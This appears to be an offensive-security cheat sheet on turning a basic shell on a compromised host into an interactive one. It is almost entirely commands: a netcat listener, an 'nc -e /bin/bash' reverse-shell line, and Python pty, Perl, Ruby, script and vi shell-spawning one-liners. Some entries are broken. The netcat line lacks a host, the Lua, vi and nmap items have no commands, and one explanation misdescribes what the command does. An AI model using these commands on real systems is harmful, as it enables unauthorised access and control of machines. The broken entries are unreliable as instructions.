🧛‍♂️Stabilize & Elevate a shell

First, it's good to have knowledge about what kind of way you can pop a shell:

pageReverse Shell & Bind Shell

If you have a nc shell tab auto complete, to up arrow and formatting problems →


nc -nlvp 80


nc -e /bin/bash 80

First technique with python:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

this relies on the target system having python

you can utilize other commands:

  1. Python:

    echo os.system('/bin/bash')

    This Python code uses the os.system() function to execute /bin/bash.

  2. Bourne Shell:

    /bin/sh -i

    This command executes the Bourne shell /bin/sh in interactive mode (-i).

  3. Using script utility:

    script -qc /bin/bash /dev/null

    This command uses the script utility to run /bin/bash with output suppression (-q) and input redirection from /dev/null.

  4. Perl:

    perl -e 'exec "/bin/sh";'

    In Perl, this command executes /bin/sh using the exec function.

  5. Ruby:

    exec "/bin/sh"

    This Ruby command uses the exec function to execute /bin/sh.

  6. Lua:


    In Lua, this command uses os.execute() to execute /bin/sh.

  7. Ruby IRB:

    exec "/bin/sh"

    This command is executed in the Ruby IRB (Interactive Ruby) shell and uses exec to execute /bin/sh.

  8. vi:


    In the vi editor, this command executes bash shell.

  9. vi (setting shell):

    :set shell=/bin/bash:shell

    This sets the shell to /bin/bash in vi.

  10. nmap:


    In nmap, the ! is used to execute shell commands. Here it's running /bin/sh.

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